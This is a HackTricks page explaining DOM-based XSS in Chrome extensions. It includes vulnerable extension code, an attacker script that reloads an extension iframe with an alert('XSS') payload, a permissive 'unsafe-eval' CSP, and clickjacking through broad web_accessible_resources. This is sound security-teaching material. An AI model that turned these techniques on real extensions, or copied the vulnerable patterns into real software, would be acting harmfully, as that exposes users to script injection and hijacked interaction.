Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Content script creates an Iframe indicating an URL in the parameters of the iFrame source:
chrome.storage.local.get("message", result =>
{
frame.src = chrome.runtime.getURL("message.html") +
"?message=" + encodeURIComponent(result.message) +
"&url=https://example.net/explanation";
});A exposed html page: message.html, accesible from the browser, contains a code such as:
$(() =>
{
let params = new URLSearchParams(location.search);
$(document.body).append(params.get("message") + " <button>Explain</button>");
$("body > button").click(() =>
{
chrome.tabs.create({ url: params.get("url") });
});
});The malicious page execute a script like the following to change the message for a XSS payload:
setTimeout(() =>
{
let frame = document.querySelector("iframe:last-child");
let src = frame.src;
// Remove existing query parameters
src = src.replace(/\?.*/, "");
// Add malicious query parameters
src += "?message=" + encodeURIComponent("<script>alert('XSS')</script>");
// Load into frame
frame.src = src;
}, 1000);A permissive Content Security Policy like
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"will allow the execution of the JS code.
Another way to trigger the XSS at will is running:
let frame = document.createElement("iframe");
frame.src = "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?message="
+ encodeURIComponent("<script>alert('XSS')</script>");
document.body.appendChild(frame);The first vulnerability is the DOM-based Cross-site Scripting (XSS) vulnerability in /html/bookmarks.html, the following is the vulnerable JavaScript from the included bookmarks.js:
$('#btAdd').click(function() {
var btname = $('#txtName').val();
if ($('.custom-button .name').filter(function() {
return $(this).text() === btname;
}).length) return false;
var span = $('<span class="custom-button">');
span.html('<span class="name">' + btname + '</span>');
span.append('<a href="javascript:void(0)" title="remove">x</a>');
span.attr('title', btname);
span.data('id', (new Date().getTime()));
$('div.custom-buttons .existing').append(span);
save_options();
});The above JavaScript takes the value of the txtName text box and uses string concatenation to build HTML which is appended to the DOM via jQuery’s “append()” function.
Normally, Chrome extension Content Security Policy (CSP) should prevent this vulnerability from being exploited. However, due to the loosening of this policy via ‘unsafe-eval’ and the use of jQuery’s DOM APIs, this was still able to be exploited. This is due to much of jQuery’s DOM APIs making use of “globalEval()”, which automatically passes scripts to “eval()” upon appending to the DOM.
While this is a serious vulnerability, on its own exploitation is fairly limited due to the user-interaction required to exploit it. The victim would have to open the page, paste a Cross-site Scripting (XSS) payload into the field, and click the “Add” button to exploit it.
In order to better weaponize this vulnerability we make use of a separate vulnerability (clickjacking) in order to bolster the attack.
The following is an excerpt from the Chrome extension’s manifest:
...trimmed for brevity...
"web_accessible_resources": [
"_locales/*",
"bundle/*",
"dist/*",
"assets/*",
"font/*",
"html/bookmarks.html",
"css/*.css",
"js/*.js",
"js/jquery/*.js",
"js/lang/*"
],
...trimmed for brevity...The above section demonstrates that the extension casts a wide net with its web_accessible_resources policy.
The /html/bookmarks.html page is also able to be framed and thus exploited via clickjacking. We abuse this to iframe this page in our web page, and overlay the frame with DOM elements to redress the layout. This makes it so that the victim is unaware that they are actually interacting with the extension below. The following animation demonstrates this effect (check the animation in the original post writeup).
- https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/
- https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.